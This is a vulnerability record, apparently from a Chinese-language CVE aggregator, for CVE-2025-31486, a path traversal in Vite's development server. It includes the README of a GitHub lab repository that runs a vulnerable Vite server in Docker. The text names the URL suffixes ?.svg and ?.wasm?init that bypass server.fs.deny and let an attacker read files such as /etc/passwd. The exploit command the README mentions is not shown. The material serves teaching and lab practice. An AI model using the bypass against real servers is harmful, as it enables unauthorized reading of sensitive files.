Vite Path Traversal Vulnerability

漏洞信息

漏洞名称： Vite Path Traversal Vulnerability

漏洞编号：

• CVE： CVE-2025-31486

漏洞类型： 目录遍历

漏洞等级： 高危

漏洞描述： 该漏洞存在于Vite开发服务器中，Vite是一个现代化的Web开发构建工具，广泛用于前端项目的快速开发和构建。此漏洞允许攻击者通过构造特殊的URL绕过安全限制，实现目录遍历攻击，读取本地文件系统中的任意文件。漏洞的核心问题在于Vite的资产插件处理URL的方式，攻击者可以通过添加特定的后缀（如?.svg和?.wasm?init）来欺骗服务器跳过关键的安全检查（特别是server.fs.deny函数），从而访问敏感文件如/etc/passwd。要利用此漏洞，项目必须使用存在漏洞的Vite版本，且开发服务器必须通过--host标志暴露在网络中。此外，文件大小限制（默认为4KB）也会影响攻击的效果，因为Vite会将小于此限制的文件作为Base64字符串内联到响应中。此漏洞可能导致敏感信息泄露，攻击者无需认证即可远程利用，对系统安全构成严重威胁。

产品厂商： Vite

产品名称： Vite

来源： https://github.com/hackmelocal/CVE-2025-31486-Simulation

类型： CVE-2025:github search

仓库文件

• Dockerfile
• README.md
• app
• docker-compose.yml

来源概述

Vite Path Traversal Lab (CVE-2025-31486)

A hands-on, containerized lab environment to simulate and exploit the Path Traversal vulnerability in Vite’s development server, identified as CVE-2025-31486.

📖 About The Vulnerability

This lab demonstrates a significant Path Traversal vulnerability found in older versions of Vite, a modern web development build tool. The vulnerability allows an attacker to bypass security constraints in the Vite development server and read arbitrary files from the local file system.

The core of the issue lies in how Vite’s asset plugin processes URLs. By crafting a special URL with suffixes like ?.svg and ?.wasm?init, an attacker can trick the server into skipping critical security checks (specifically the server.fs.deny function), granting access to sensitive files like /etc/passwd.

Conditions for Exploitation

• Vulnerable Vite Version: The project must use a vulnerable version of Vite.
• Exposed Dev Server: The server must be exposed to the network using the --host flag.
• File Size Limit: The exploit works best for files smaller than the build.assetsInlineLimit (default is 4KB), as Vite inlines these files as Base64 strings in its response.

---

🎯 Live Simulation Lab

This repository contains everything you need to safely run a vulnerable Vite server and perform the exploit yourself. You can run the simulation in two ways:

Method 1: Run in GitHub Codespaces (Recommended)

Get a full, cloud-based development environment in seconds. No local setup required.

1. Launch Codespace: Click the “Open in GitHub Codespaces” button at the top of this README.
   

2. Wait for Setup: GitHub will prepare your cloud environment. This might take a minute. A terminal will appear at the bottom of the editor once it’s ready.

3. Start the Vulnerable Server: In the terminal, run the following single command:

   docker compose up

   You will see output indicating that the vulnerable Vite development server is running and accessible.

4. Perform the Exploit:

   • Open a new terminal in your Codespace (Click the + icon in the terminal panel).
   • Copy and paste the one-line exploit command below into the new terminal and press Enter.

Method 2: Run Locally

If you prefer to run the lab on your own machine, follow these steps.

Prerequisites:

• Docker must be installed.
• Docker Compose must be installed.

Instructions:

1. Clone the Repository:

   git clone https://github.com/hackmelocal/CVE-2025-31486-Simulation.git
   cd CVE-2025-31486-Simulation

2. Start the Vulnerable Server: In your terminal, run the single command:

   docker compose up

   This command will build the Docker image (if not already built) and start the vulnerable Vite server.

3. Perform the Exploit:

   • Open a new, separate terminal window or tab.
   • Copy and paste the one-line exploit command below into the new terminal and press Enter.